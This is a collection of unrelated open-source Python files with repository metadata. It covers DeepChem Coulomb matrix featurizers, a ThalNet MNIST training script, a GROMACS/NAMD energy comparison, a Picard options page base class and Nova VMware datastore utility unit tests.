x[self.features == featureSet] t = float64(self.func(x[self.labels == 0], x[self.labels == 1])[0]) return t # keys should be all lowercase, access should call .lower() CLASSIFIERS = { 'gaussnaivebayes': GaussNaiveBayesClassifier, 'ttest': TTestClassifier }
oliverhuangchao/thunder
thunder/decoding/uniclassify.py
Python
apache-2.0
7,078
# Bloom Framework # # John Boxall # Copyright 2008 Handi Mobility # www.handimobility.ca
kevintom/django-bloom
bloom/image/templatetags/__init__.py
Python
gpl-3.0
89
#!/usr/bin/env python __author__ = 'Andreas M. Wahl' import sys import os import random class SimulatorMock: def __init__(self, runDirectory, uuid): self.runDirectory = runDirectory self.uuid = uuid def writeOutput(self): strings = ['scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: First contact - Avg.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: First contact - Max.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: First contact - Min.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - All nodes - Avg.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - All nodes - Max.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - All nodes - Min.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - One node - Avg.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - One node - Max.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - One node - Min.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Received packets.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Sent packets.mean"'] fileContent = "" for string in strings: fileContent += string + " " + str(random.random()) + "\n" fileName = self.runDirectory + "/results/" + str(self.uuid) + "-0.sca" dir = os.path.dirname(fileName) if not os.path.exists(dir): os.makedirs(dir) fileObject = open(fileName, 'w') fileObject.write(fileContent) print "End." sys.stdout.flush() mock = SimulatorMock(sys.argv[1], sys.argv[2]) mock.writeOutput()
ClockworkOrigins/m2etis
configurator/autosim/mock/SimulatorMock.py
Python
apache-2.0
2,146
""" Generate coulomb matrices for molecules. See Montavon et al., _New Journal of Physics_ __15__ (2013) 095003. """ import numpy as np import deepchem as dc from deepchem.feat.base_classes import MolecularFeaturizer from deepchem.utils import pad_array from deepchem.feat.atomic_coordinates import AtomicCoordinates class BPSymmetryFunctionInput(MolecularFeaturizer): """Calculate Symmetry Function for each atom in the molecules This method is described in [1]_ References ---------- .. [1] Behler, Jörg, and Michele Parrinello. "Generalized neural-network representation of high-dimensional potential-energy surfaces." Physical review letters 98.14 (2007): 146401. Note ---- This class requires RDKit to be installed. """ def __init__(self, max_atoms): """Initialize this featurizer. Parameters ---------- max_atoms: int The maximum number of atoms expected for molecules this featurizer will process. """ self.max_atoms = max_atoms def _featurize(self, mol): coordfeat = AtomicCoordinates() coordinates = coordfeat._featurize(mol)[0] atom_numbers = np.array([atom.GetAtomicNum() for atom in mol.GetAtoms()]) atom_numbers = np.expand_dims(atom_numbers, axis=1) assert atom_numbers.shape[0] == coordinates.shape[0] n_atoms = atom_numbers.shape[0] features = np.concatenate([atom_numbers, coordinates], axis=1) return np.pad(features, ((0, self.max_atoms - n_atoms), (0, 0)), 'constant') class CoulombMatrix(MolecularFeaturizer): """Calculate Coulomb matrices for molecules. Coulomb matrices provide a representation of the electronic structure of a molecule. This method is described in [1]_. Parameters ---------- max_atoms : int Maximum number of atoms for any molecule in the dataset. Used to pad the Coulomb matrix. remove_hydrogens : bool, optional (default False) Whether to remove hydrogens before constructing Coulomb matrix. randomize : bool, optional (default False) Whether to randomize Coulomb matrices to remove dependence on atom index order. upper_tri : bool, optional (default False) Whether to return the upper triangular portion of the Coulomb matrix. n_samples : int, optional (default 1) Number of random Coulomb matrices to generate if randomize is True. seed : int, optional Random seed. Example ------- >>> featurizers = dc.feat.CoulombMatrix(max_atoms=23) >>> input_file = 'deepchem/feat/tests/data/water.sdf' # really backed by water.sdf.csv >>> tasks = ["atomization_energy"] >>> loader = dc.data.SDFLoader(tasks, featurizer=featurizers) >>> dataset = loader.create_dataset(input_file) #doctest: +ELLIPSIS Reading structures from deepchem/feat/tests/data/water.sdf. References ---------- .. [1] Montavon, Grégoire, et al. "Learning invariant representations of molecules for atomization energy prediction." Advances in neural information processing systems. 2012. Note ---- This class requires RDKit to be installed. """ conformers = True name = 'coulomb_matrix' def __init__(self, max_atoms, remove_hydrogens=False, randomize=False, upper_tri=False, n_samples=1, seed=None): """Initialize this featurizer. Parameters ---------- max_atoms: int The maximum number of atoms expected for molecules this featurizer will process. remove_hydrogens: bool, optional (default False) If True, remove hydrogens before processing them. randomize: bool, optional (default False) If True, use method `randomize_coulomb_matrices` to randomize Coulomb matrices. upper_tri: bool, optional (default False) Generate only upper triangle part of Coulomb matrices. n_samples: int, optional (default 1) If `randomize` is set to True, the number of random samples to draw. seed: int, optional (default None) Random seed to use. """ try: from rdkit import Chem except ModuleNotFoundError: raise ValueError("This class requires RDKit to be installed.") self.max_atoms = int(max_atoms) self.remove_hydrogens = remove_hydrogens self.randomize = randomize self.upper_tri = upper_tri self.n_samples = n_samples if seed is not None: seed = int(seed) self.seed = seed def _featurize(self, mol): """ Calculate Coulomb matrices for molecules. If extra randomized matrices are generated, they are treated as if they are features for additional conformers. Since Coulomb matrices are symmetric, only the (flattened) upper triangular portion is returned. Parameters ---------- mol : RDKit Mol Molecule. """ features = self.coulomb_matrix(mol) if self.upper_tri: features = [f[np.triu_indices_from(f)] for f in features] features = np.asarray(features) return features def coulomb_matrix(self, mol): """ Generate Coulomb matrices for each conformer of the given molecule. Parameters ---------- mol : RDKit Mol Molecule. """ from rdkit import Chem if self.remove_hydrogens: mol = Chem.RemoveHs(mol) n_atoms = mol.GetNumAtoms() z = [atom.GetAtomicNum() for atom in mol.GetAtoms()] rval = [] for conf in mol.GetConformers(): d = self.get_interatomic_distances(conf) m = np.outer(z, z) / d m[range(n_atoms), range(n_atoms)] = 0.5 * np.array(z)**2.4 if self.randomize: for random_m in self.randomize_coulomb_matrix(m): random_m = pad_array(random_m, self.max_atoms) rval.append(random_m) else: m = pad_array(m, self.max_atoms) rval.append(m) rval = np.asarray(rval) return rval def randomize_coulomb_matrix(self, m): """Randomize a Coulomb matrix as decribed in [1]_: 1. Compute row norms for M in a vector row_norms. 2. Sample a zero-mean unit-variance noise vector e with dimension equal to row_norms. 3. Permute the rows and columns of M with the permutation that sorts row_norms + e. Parameters ---------- m : ndarray Coulomb matrix. n_samples : int, optional (default 1) Number of random matrices to generate. seed : int, optional Random seed. References ---------- .. [1] Montavon et al., New Journal of Physics, 15, (2013), 095003 """ rval = [] row_norms = np.asarray([np.linalg.norm(row) for row in m], dtype=float) rng = np.random.RandomState(self.seed) for i in range(self.n_samples): e = rng.normal(size=row_norms.size) p = np.argsort(row_norms + e) new = m[p][:, p] # permute rows first, then columns rval.append(new) return rval @staticmethod def get_interatomic_distances(conf): """ Get interatomic distances for atoms in a molecular conformer. Parameters ---------- conf : RDKit Conformer Molecule conformer. """ n_atoms = conf.GetNumAtoms() coords = [ conf.GetAtomPosition(i).__idiv__(0.52917721092) for i in range(n_atoms) ] # Convert AtomPositions from Angstrom to bohr (atomic units) d = np.zeros((n_atoms, n_atoms), dtype=float) for i in range(n_atoms): for j in range(i): d[i, j] = coords[i].Distance(coords[j]) d[j, i] = d[i, j] return d class CoulombMatrixEig(CoulombMatrix): """Calculate the eigenvalues of Coulomb matrices for molecules. This featurizer computes the eigenvalues of the Coulomb matrices for provided molecules. Coulomb matrices are described in [1]_. Parameters ---------- max_atoms : int Maximum number of atoms for any molecule in the dataset. Used to pad the Coulomb matrix. remove_hydrogens : bool, optional (default False) Whether to remove hydrogens before constructing Coulomb matrix. randomize : bool, optional (default False) Whether to randomize Coulomb matrices to remove dependence on atom index order. n_samples : int, optional (default 1) Number of random Coulomb matrices to generate if randomize is True. seed : int, optional Random seed. Example ------- >>> featurizers = dc.feat.CoulombMatrixEig(max_atoms=23) >>> input_file = 'deepchem/feat/tests/data/water.sdf' # really backed by water.sdf.csv >>> tasks = ["atomization_energy"] >>> loader = dc.data.SDFLoader(tasks, featurizer=featurizers) >>> dataset = loader.create_dataset(input_file) #doctest: +ELLIPSIS Reading structures from deepchem/feat/tests/data/water.sdf. References ---------- .. [1] Montavon, Grégoire, et al. "Learning invariant representations of molecules for atomization energy prediction." Advances in neural information processing systems. 2012. """ conformers = True name = 'coulomb_matrix' def __init__(self, max_atoms, remove_hydrogens=False, randomize=False, n_samples=1, seed=None): """Initialize this featurizer. Parameters ---------- max_atoms: int The maximum number of atoms expected for molecules this featurizer will process. remove_hydrogens: bool, optional (default False) If True, remove hydrogens before processing them. randomize: bool, optional (default False) If True, use method `randomize_coulomb_matrices` to randomize Coulomb matrices. n_samples: int, optional (default 1) If `randomize` is set to True, the number of random samples to draw. seed: int, optional (default None) Random seed to use. """ self.max_atoms = int(max_atoms) self.remove_hydrogens = remove_hydrogens self.randomize = randomize self.n_samples = n_samples if seed is not None: seed = int(seed) self.seed = seed def _featurize(self, mol): """ Calculate eigenvalues of Coulomb matrix for molecules. Eigenvalues are returned sorted by absolute value in descending order and padded by max_atoms. Parameters ---------- mol : RDKit Mol Molecule. """ cmat = self.coulomb_matrix(mol) features = [] for f in cmat: w, v = np.linalg.eig(f) w_abs = np.abs(w) sortidx = np.argsort(w_abs) sortidx = sortidx[::-1] w = w[sortidx] f = pad_array(w, self.max_atoms) features.append(f) features = np.asarray(features) return features
miaecle/deepchem
deepchem/feat/coulomb_matrices.py
Python
mit
10,564
# -*- coding: utf-8 -*- # # Picard, the next-generation MusicBrainz tagger # Copyright (C) 2006 Lukáš Lalinský # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. from PyQt4 import QtGui from picard.plugin import ExtensionPoint class OptionsCheckError(Exception): def __init__(self, title, info): self.title = title self.info = info class OptionsPage(QtGui.QWidget): PARENT = None SORT_ORDER = 1000 ACTIVE = True def info(self): raise NotImplementedError def check(self): pass def load(self): pass def save(self): pass def display_error(self, error): dialog = QtGui.QMessageBox(QtGui.QMessageBox.Warning, error.title, error.info, QtGui.QMessageBox.Ok, self) dialog.exec_() _pages = ExtensionPoint() def register_options_page(page_class): _pages.register(page_class.__module__, page_class)
lalinsky/picard-debian
picard/ui/options/__init__.py
Python
gpl-2.0
1,569
import itertools from pathlib import Path import numpy as np import tensorflow as tf from model import SequenceClassifier, ThalNetCell, GRUCell,MLPClassifier from util import timestamp from tensorflow.examples.tutorials.mnist import input_data import argparse from plot import plot_learning_curve def plot_image(image: np.ndarray, label: str) -> None: from matplotlib import pyplot as plt plt.title(f'Label {label}') plt.imshow(image) plt.show() def main(batch_size: int = 100, log_path: Path = Path.home() / 'Desktop/thalnet/tensorboard' / timestamp()): mnist = input_data.read_data_sets('mnist', one_hot=True) num_classes = 10 num_rows, row_size = 28,28 summary_writer = tf.summary.FileWriter(str(log_path), graph=tf.get_default_graph()) def get_batch(train,batch_size): """Make a TensorFlow feed_dict: maps data onto Tensor placeholders.""" if train: xs, ys = mnist.train.next_batch(batch_size) else: #rows = np.random.randint(1000,size=batch_size) #xs, ys = mnist.test.images[:rows,:], mnist.test.labels[:rows,:] xs, ys = mnist.test.images[:1000,:], mnist.test.labels[:1000,:] return {'x': xs, 'y': ys} def feed_dict(batch): return {data: batch['x'], target: batch['y'], dropout: 0} get_thalnet_cell = lambda: ThalNetCell(input_size=row_size, output_size=num_classes, context_input_size=32, center_size_per_module=32,num_modules=4) get_stacked_cell = lambda: GRUCell(num_hidden=50,num_layers=4) models = [lambda: MLPClassifier(data, target, dropout, num_hidden=64, num_layers=2), lambda: SequenceClassifier(data, target, dropout, get_rnn_cell=get_stacked_cell,num_rows=num_rows, row_size=row_size), lambda: SequenceClassifier(data, target, dropout, get_rnn_cell=get_thalnet_cell,num_rows=num_rows, row_size=row_size) ] labels = ['MLP-baseline','GRU-baseline','ThalNet-FF-GRU'] ys,zs = [],[] for model in models: with tf.Session() as session: data = tf.placeholder(tf.float32, [None, num_rows*row_size], name='data') target = tf.placeholder(tf.float32, [None, num_classes], name='target') dropout = tf.placeholder(tf.float32, name='dropout') model = model() # reproduce result under 60,000 total parameters for all three models print(f'{model.num_parameters} parameters') if model.num_parameters > 60000: session.close() return y,z = [],[] session.run(tf.global_variables_initializer()) for batch_index in itertools.count(): train_batch = get_batch(True,batch_size) _, train_cross_entropy, train_accuracy, train_summary = session.run( [model.optimize, model.cross_entropy, model.accuracy, model.train_summary], feed_dict=feed_dict(train_batch)) summary_writer.add_summary(train_summary, batch_index) if batch_index % 1 == 0: test_batch = get_batch(False,batch_size) test_cross_entropy, test_accuracy, test_summary = session.run( [model.cross_entropy, model.accuracy, model.test_summary], feed_dict=feed_dict(test_batch)) summary_writer.add_summary(test_summary, batch_index) summary_writer.add_summary(session.run(model.weights_summary), batch_index) y.append(test_accuracy) z.append(test_cross_entropy) print( f'Batch {batch_index}: train accuracy {train_accuracy:.3f} (cross entropy {train_cross_entropy:.3f}), test accuracy {test_accuracy:.3f} (cross entropy {test_cross_entropy:.3f})') if batch_index == 2000: ys.append(y) zs.append(z) break session.close() tf.reset_default_graph() plot_learning_curve('Sequential Mnist',ys,zs, labels,ylim=(0,1)) if __name__ == '__main__': parser = argparse.ArgumentParser() args = parser.parse_args() main()
JuliusKunze/thalnet
main.py
Python
mit
4,277
import os from collections import OrderedDict import sys fil = open('energy.xvg').readlines() GMX_dat = [float(f)/4.184 for f in fil[-1].split()[1:-1]] nfil = open('LOG_NAMD').readlines() for line in nfil: if 'ENERGY: 200' in line: NAMD_DAT = [float(f) for f in line.split()[2:12]] #print(NAMD_DAT) #print(GMX_dat) print('GMX: %6.3f NAMD: %6.3f BOND_DIFF: %5.5f'%(GMX_dat[0],NAMD_DAT[0],GMX_dat[0]-NAMD_DAT[0])) print('GMX: %6.3f NAMD: %6.3f ANGL_DIFF: %5.5f'%(GMX_dat[1],NAMD_DAT[1],GMX_dat[1]-NAMD_DAT[1])) print('GMX: %6.3f NAMD: %6.3f TORS_DIFF: %5.5f'%(GMX_dat[2],NAMD_DAT[2],GMX_dat[2]-NAMD_DAT[2])) print('GMX: %6.3f NAMD: %6.3f IMPR_DIFF: %5.5f'%(GMX_dat[3],NAMD_DAT[3],GMX_dat[3]-NAMD_DAT[3])) print('GMX: %6.3f NAMD: %6.3f ELEC_DIFF: %5.5f'%(GMX_dat[5]+GMX_dat[7],NAMD_DAT[4],(GMX_dat[5]+GMX_dat[7])-(NAMD_DAT[4]))) print('GMX: %6.3f NAMD: %6.3f VDWL_DIFF: %5.5f'%(GMX_dat[4]+GMX_dat[6],NAMD_DAT[5],GMX_dat[4]+GMX_dat[6]-NAMD_DAT[5])) print('GMX: %6.3f NAMD: %6.3f TOTL_DIFF: %5.5f'%(GMX_dat[8],NAMD_DAT[9],GMX_dat[8]-NAMD_DAT[9]))
leelasd/OPLS-AAM_for_Gromacs
GMX_TEST/GXG/RN/NAMD_GMX_DIFF.py
Python
mit
1,063
# Copyright (c) 2014 VMware, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import contextlib import re import mock from oslo_utils import units from oslo_vmware import exceptions as vexc from oslo_vmware.objects import datastore as ds_obj from nova import exception from nova import test from nova.tests.unit.virt.vmwareapi import fake from nova.virt.vmwareapi import ds_util class DsUtilTestCase(test.NoDBTestCase): def setUp(self): super(DsUtilTestCase, self).setUp() self.session = fake.FakeSession() self.flags(api_retry_count=1, group='vmware') fake.reset() def tearDown(self): super(DsUtilTestCase, self).tearDown() fake.reset() def test_file_delete(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('DeleteDatastoreFile_Task', method) name = kwargs.get('name') self.assertEqual('[ds] fake/path', name) datacenter = kwargs.get('datacenter') self.assertEqual('fake-dc-ref', datacenter) return 'fake_delete_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): ds_path = ds_obj.DatastorePath('ds', 'fake/path') ds_util.file_delete(self.session, ds_path, 'fake-dc-ref') _wait_for_task.assert_has_calls([ mock.call('fake_delete_task')]) def test_file_copy(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('CopyDatastoreFile_Task', method) src_name = kwargs.get('sourceName') self.assertEqual('[ds] fake/path/src_file', src_name) src_dc_ref = kwargs.get('sourceDatacenter') self.assertEqual('fake-src-dc-ref', src_dc_ref) dst_name = kwargs.get('destinationName') self.assertEqual('[ds] fake/path/dst_file', dst_name) dst_dc_ref = kwargs.get('destinationDatacenter') self.assertEqual('fake-dst-dc-ref', dst_dc_ref) return 'fake_copy_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): src_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'src_file') dst_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'dst_file') ds_util.file_copy(self.session, str(src_ds_path), 'fake-src-dc-ref', str(dst_ds_path), 'fake-dst-dc-ref') _wait_for_task.assert_has_calls([ mock.call('fake_copy_task')]) def test_file_move(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('MoveDatastoreFile_Task', method) sourceName = kwargs.get('sourceName') self.assertEqual('[ds] tmp/src', sourceName) destinationName = kwargs.get('destinationName') self.assertEqual('[ds] base/dst', destinationName) sourceDatacenter = kwargs.get('sourceDatacenter') self.assertEqual('fake-dc-ref', sourceDatacenter) destinationDatacenter = kwargs.get('destinationDatacenter') self.assertEqual('fake-dc-ref', destinationDatacenter) return 'fake_move_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): src_ds_path = ds_obj.DatastorePath('ds', 'tmp/src') dst_ds_path = ds_obj.DatastorePath('ds', 'base/dst') ds_util.file_move(self.session, 'fake-dc-ref', src_ds_path, dst_ds_path) _wait_for_task.assert_has_calls([ mock.call('fake_move_task')]) def test_disk_move(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('MoveVirtualDisk_Task', method) src_name = kwargs.get('sourceName') self.assertEqual('[ds] tmp/src', src_name) dest_name = kwargs.get('destName') self.assertEqual('[ds] base/dst', dest_name) src_datacenter = kwargs.get('sourceDatacenter') self.assertEqual('fake-dc-ref', src_datacenter) dest_datacenter = kwargs.get('destDatacenter') self.assertEqual('fake-dc-ref', dest_datacenter) return 'fake_move_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): ds_util.disk_move(self.session, 'fake-dc-ref', '[ds] tmp/src', '[ds] base/dst') _wait_for_task.assert_has_calls([ mock.call('fake_move_task')]) def test_disk_copy(self): with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', return_value=mock.sentinel.cm) ) as (_wait_for_task, _call_method): ds_util.disk_copy(self.session, mock.sentinel.dc_ref, mock.sentinel.source_ds, mock.sentinel.dest_ds) _wait_for_task.assert_called_once_with(mock.sentinel.cm) _call_method.assert_called_once_with( mock.ANY, 'CopyVirtualDisk_Task', 'VirtualDiskManager', sourceName='sentinel.source_ds', destDatacenter=mock.sentinel.dc_ref, sourceDatacenter=mock.sentinel.dc_ref, force=False, destName='sentinel.dest_ds') def test_disk_delete(self): with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', return_value=mock.sentinel.cm) ) as (_wait_for_task, _call_method): ds_util.disk_delete(self.session, 'fake-dc-ref', '[ds] tmp/disk.vmdk') _wait_for_task.assert_called_once_with(mock.sentinel.cm) _call_method.assert_called_once_with( mock.ANY, 'DeleteVirtualDisk_Task', 'VirtualDiskManager', datacenter='fake-dc-ref', name='[ds] tmp/disk.vmdk') def test_mkdir(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('MakeDirectory', method) name = kwargs.get('name') self.assertEqual('[ds] fake/path', name) datacenter = kwargs.get('datacenter') self.assertEqual('fake-dc-ref', datacenter) createParentDirectories = kwargs.get('createParentDirectories') self.assertTrue(createParentDirectories) with mock.patch.object(self.session, '_call_method', fake_call_method): ds_path = ds_obj.DatastorePath('ds', 'fake/path') ds_util.mkdir(self.session, ds_path, 'fake-dc-ref') def test_file_exists(self): def fake_call_method(module, method, *args, **kwargs): if method == 'SearchDatastore_Task': ds_browser = args[0] self.assertEqual('fake-browser', ds_browser) datastorePath = kwargs.get('datastorePath') self.assertEqual('[ds] fake/path', datastorePath) return 'fake_exists_task' # Should never get here self.fail() def fake_wait_for_task(task_ref): if task_ref == 'fake_exists_task': result_file = fake.DataObject() result_file.path = 'fake-file' result = fake.DataObject() result.file = [result_file] result.path = '[ds] fake/path' task_info = fake.DataObject() task_info.result = result return task_info # Should never get here self.fail() with contextlib.nested( mock.patch.object(self.session, '_call_method', fake_call_method), mock.patch.object(self.session, '_wait_for_task', fake_wait_for_task)): ds_path = ds_obj.DatastorePath('ds', 'fake/path') file_exists = ds_util.file_exists(self.session, 'fake-browser', ds_path, 'fake-file') self.assertTrue(file_exists) def test_file_exists_fails(self): def fake_call_method(module, method, *args, **kwargs): if method == 'SearchDatastore_Task': return 'fake_exists_task' # Should never get here self.fail() def fake_wait_for_task(task_ref): if task_ref == 'fake_exists_task': raise vexc.FileNotFoundException() # Should never get here self.fail() with contextlib.nested( mock.patch.object(self.session, '_call_method', fake_call_method), mock.patch.object(self.session, '_wait_for_task', fake_wait_for_task)): ds_path = ds_obj.DatastorePath('ds', 'fake/path') file_exists = ds_util.file_exists(self.session, 'fake-browser', ds_path, 'fake-file') self.assertFalse(file_exists) def _mock_get_datastore_calls(self, *datastores): """Mock vim_util calls made by get_datastore.""" datastores_i = [None] # For the moment, at least, this list of datastores is simply passed to # get_properties_for_a_collection_of_objects, which we mock below. We # don't need to over-complicate the fake function by worrying about its # contents. fake_ds_list = ['fake-ds'] def fake_call_method(module, method, *args, **kwargs): # Mock the call which returns a list of datastores for the cluster if (module == ds_util.vim_util and method == 'get_dynamic_property' and args == ('fake-cluster', 'ClusterComputeResource', 'datastore')): fake_ds_mor = fake.DataObject() fake_ds_mor.ManagedObjectReference = fake_ds_list return fake_ds_mor # Return the datastore result sets we were passed in, in the order # given if (module == ds_util.vim_util and method == 'get_properties_for_a_collection_of_objects' and args[0] == 'Datastore' and args[1] == fake_ds_list): # Start a new iterator over given datastores datastores_i[0] = iter(datastores) return next(datastores_i[0]) # Continue returning results from the current iterator. if (module == ds_util.vutil and method == 'continue_retrieval'): try: return next(datastores_i[0]) except StopIteration: return None if (method == 'continue_retrieval' or method == 'cancel_retrieval'): return # Sentinel that get_datastore's use of vim has changed self.fail('Unexpected vim call in get_datastore: %s' % method) return mock.patch.object(self.session, '_call_method', side_effect=fake_call_method) def test_get_datastore(self): fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore()) fake_objects.add_object(fake.Datastore("fake-ds-2", 2048, 1000, False, "normal")) fake_objects.add_object(fake.Datastore("fake-ds-3", 4096, 2000, True, "inMaintenance")) with self._mock_get_datastore_calls(fake_objects): result = ds_util.get_datastore(self.session, 'fake-cluster') self.assertEqual("fake-ds", result.name) self.assertEqual(units.Ti, result.capacity) self.assertEqual(500 * units.Gi, result.freespace) def test_get_datastore_with_regex(self): # Test with a regex that matches with a datastore datastore_valid_regex = re.compile("^openstack.*\d$") fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore("openstack-ds0")) fake_objects.add_object(fake.Datastore("fake-ds0")) fake_objects.add_object(fake.Datastore("fake-ds1")) with self._mock_get_datastore_calls(fake_objects): result = ds_util.get_datastore(self.session, 'fake-cluster', datastore_valid_regex) self.assertEqual("openstack-ds0", result.name) def test_get_datastore_with_token(self): regex = re.compile("^ds.*\d$") fake0 = fake.FakeRetrieveResult() fake0.add_object(fake.Datastore("ds0", 10 * units.Gi, 5 * units.Gi)) fake0.add_object(fake.Datastore("foo", 10 * units.Gi, 9 * units.Gi)) setattr(fake0, 'token', 'token-0') fake1 = fake.FakeRetrieveResult() fake1.add_object(fake.Datastore("ds2", 10 * units.Gi, 8 * units.Gi)) fake1.add_object(fake.Datastore("ds3", 10 * units.Gi, 1 * units.Gi)) with self._mock_get_datastore_calls(fake0, fake1): result = ds_util.get_datastore(self.session, 'fake-cluster', regex) self.assertEqual("ds2", result.name) def test_get_datastore_with_list(self): # Test with a regex containing whitelist of datastores datastore_valid_regex = re.compile("(openstack-ds0|openstack-ds2)") fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore("openstack-ds0")) fake_objects.add_object(fake.Datastore("openstack-ds1")) fake_objects.add_object(fake.Datastore("openstack-ds2")) with self._mock_get_datastore_calls(fake_objects): result = ds_util.get_datastore(self.session, 'fake-cluster', datastore_valid_regex) self.assertNotEqual("openstack-ds1", result.name) def test_get_datastore_with_regex_error(self): # Test with a regex that has no match # Checks if code raises DatastoreNotFound with a specific message datastore_invalid_regex = re.compile("unknown-ds") exp_message = ("Datastore regex %s did not match any datastores" % datastore_invalid_regex.pattern) fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore("fake-ds0")) fake_objects.add_object(fake.Datastore("fake-ds1")) # assertRaisesRegExp would have been a good choice instead of # try/catch block, but it's available only from Py 2.7. try: with self._mock_get_datastore_calls(fake_objects): ds_util.get_datastore(self.session, 'fake-cluster', datastore_invalid_regex) except exception.DatastoreNotFound as e: self.assertEqual(exp_message, e.args[0]) else: self.fail("DatastoreNotFound Exception was not raised with " "message: %s" % exp_message) def test_get_datastore_without_datastore(self): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, fake.FakeObjectRetrievalSession(None), cluster="fake-cluster") def test_get_datastore_inaccessible_ds(self): data_store = fake.Datastore() data_store.set("summary.accessible", False) fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(data_store) with self._mock_get_datastore_calls(fake_objects): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, self.session, 'fake-cluster') def test_get_datastore_ds_in_maintenance(self): data_store = fake.Datastore() data_store.set("summary.maintenanceMode", "inMaintenance") fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(data_store) with self._mock_get_datastore_calls(fake_objects): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, self.session, 'fake-cluster') def test_get_datastore_no_host_in_cluster(self): def fake_call_method(module, method, *args, **kwargs): return '' with mock.patch.object(self.session, '_call_method', fake_call_method): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, self.session, 'fake-cluster') def _test_is_datastore_valid(self, accessible=True, maintenance_mode="normal", type="VMFS", datastore_regex=None, ds_types=ds_util.ALL_SUPPORTED_DS_TYPES): propdict = {} propdict["summary.accessible"] = accessible propdict["summary.maintenanceMode"] = maintenance_mode propdict["summary.type"] = type propdict["summary.name"] = "ds-1" return ds_util._is_datastore_valid(propdict, datastore_regex, ds_types) def test_is_datastore_valid(self): for ds_type in ds_util.ALL_SUPPORTED_DS_TYPES: self.assertTrue(self._test_is_datastore_valid(True, "normal", ds_type)) def test_is_datastore_valid_inaccessible_ds(self): self.assertFalse(self._test_is_datastore_valid(False, "normal", "VMFS")) def test_is_datastore_valid_ds_in_maintenance(self): self.assertFalse(self._test_is_datastore_valid(True, "inMaintenance", "VMFS")) def test_is_datastore_valid_ds_type_invalid(self): self.assertFalse(self._test_is_datastore_valid(True, "normal", "vfat")) def test_is_datastore_valid_not_matching_regex(self): datastore_regex = re.compile("ds-2") self.assertFalse(self._test_is_datastore_valid(True, "normal", "VMFS", datastore_regex)) def test_is_datastore_valid_matching_regex(self): datastore_regex = re.compile("ds-1") self.assertTrue(self._test_is_datastore_valid(True, "normal", "VMFS", datastore_regex))
nikesh-mahalka/nova
nova/tests/unit/virt/vmwareapi/test_ds_util.py
Python
apache-2.0
20,458
